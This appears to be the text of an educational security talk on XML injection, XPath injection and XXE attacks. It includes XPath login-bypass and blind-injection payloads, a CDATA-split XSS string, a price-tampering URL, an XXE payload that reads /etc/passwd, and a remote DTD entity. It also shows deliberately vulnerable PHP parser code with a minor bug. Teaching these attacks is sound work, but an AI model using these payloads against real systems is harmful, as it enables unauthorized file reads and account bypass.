2. About Me
➢ Student at UCSY
➢ Programmer
➢ Security Enthusiast
➢ Contributor at OWASP Myanmar
➢ Organizer at Myanmar Cyber Conference
3. ● Extensible Markup Language (XML)
● Textual Data Format
● Focus on Documents
● Use to annotate text or add additional information
● Relies on Document Type Definition (DTD)
What is XML?
4. XML Structure
● XML Header (Document Type Definition – DTD)
<?xml version=”1.0” encoding=”ISO-8859-1"?>
● Elements
<item>
<itemId> 1 </itemId>
<itemName> Book </itemName>
</item>
5.
6. Types of XML vulnerabilities
XML Injection (TAG Injection)
XPath Injection
XML External Entities (XXE)
7. XML Injection
● Try to inject XML doc to application and XML parser fails
to validate data
● Try to insert XML characters, tags, methods, etc..
● Possible to inject XML data & tags to xml database
● Possible to test with Single Quote ‘ when not sanitized
Example; <username attrib=’$usernameInput’ /> when single quote add
it became …
<username attrib=’admin’’ />
9. Testing for XML Injection
● Different Attack Surface; Input Fields like User
Registration, Update Information and so on.
● Both GET and POST
● Use Escape Characters to invalidate XML document
10. Exploitation for XML Injection
● New value of existing tag from elements
<username> Toe </username>
● Using Comment tag <!-- Tag -->
<!-- username --> <username>Toe</username>
● CDATA section delimiters
<username> <! [CDATA[<$userName]]></username>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
11. Example Code
<book>
<id> 102 </id>
<bookName> Sherlock </bookName>
<price> 200 </price>
</book>
When user buys book from store, the url may be
http://shop.com/buy.php?bookID=102&bookName=Sherlock&price=200
When attacker inject the existing price tag with new value
http://shop.com/buy.php?bookID=102&bookName=Sherlock&<price>0</price>
<book>
<id> 102 </id>
<bookName> Sherlock </bookName>
<price> 0 </price>
<price> 200 </price>
</book>
12. XML Injection Cheat Sheets
https://github.com/toekhaing/xml_attacks/blob/master/xml_injection.txt
13. Xpath Injection
● Xpath refers to XML Path Language
● Xpath Injection is similar to SQL injection.
● Another Type of XML Injection
● Less Awareness
● Occurs in Xpath Query for XML data when input data are
not sanitized to verify
● Possible to get entire document
14. Detection for XPath Injection
● ‘ Single Quote
● “ Double Quote
● ‘ or ‘a’=’a
● ‘ and ‘a’=’b
● OR 1=1
● AND 1=2
15. Exploitation for XPath Injection
Common Xpath Payloads
'or '1'='1
'or 1=1 or '='
]|*|user[@role='admin
"NODENAME" (Return all children of node)
"//NODENAME" (Return all elements in the document)
"NODeNAME//SUBNODENAME" (return all SUBNODE under NODE element)
"//NODENAME/[NAME="VALUE" (value = admin)
16. Blind XPath Injection
● count(//user/child::node() - Return the number of
nodes
● Find the error with injecting the following code
‘ or count (parent::*[position()=1])=0 or ‘a’=’b
‘ or count (parent::*[position()=1])>0 or ‘a’=’b
1 or count (parent::*[position()=1])=0
1 or count (parent::*[position()=1])>0
17. Example Attack & Resources
● Login Bypass
http://site.com/login.php?username=admin’ or 1=1 or ‘’=’
● Tools
Xcat (https://github.com/orf/xcat)
● Cheat Sheets
https://github.com/toekhaing/xml_attacks/blob/master/xpath
_Injection.txt
18. XML External Entities (XXE)
● Type of Injection Attack to an application that parses XML
input.
● Caused by misconfigured XML Parser.
● Leads to Extracting Sensitive Data
● Remote Code Execution (RCE) in some cases
19. Common XXE Vulnerabilities
● Apache POI
● CVE-2014-3574
● CVE-2014-3529
● DOCX4J
● OpenXML SDK
● NOKOGIRI
● CVE-2012-6685
● CVE-2014-3660
● Play Framework XXE
20. Finding XXE Flaws
● Wide Attack Surface
● Register Page, login page, file upload and etc.
● Checking [Content-Type].xml
21. Detection for XXE Vulnerability
● Read local files on web server by using SYSTEM entity
<!ENTITY xxe SYSTEM “file:///etc/passwd “ >
● Process Document Type Declaration (DTD) to remote
<!ENTITY xxe SYSTEM "http://IP:PORT/test.dtd">
● File Upload (OOXML)
Upload file xml, docx, xlsx with embedded xxe payload.
22. Example Attack
PHP Code
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT |
LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $login->user;
$pass = $login->pass;
echo "You have logged in as user $user";
?>
Request
<login>
<user>Toe</user>
<pass>mypass</pass>
</login>
23. Exploitation
Simple XXE Payload that extract local file /etc/passwd
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<login>
<user>&xxe;</user>
<pass>mypass</pass>
</login>
27. Case Study
Pentester Lab : Play XML Entities
https://www.vulnhub.com/entry/pentester-lab-play-xml-entities,119
Notes & Collections of XML Attacks
https://github.com/toekhaing/xml_attacks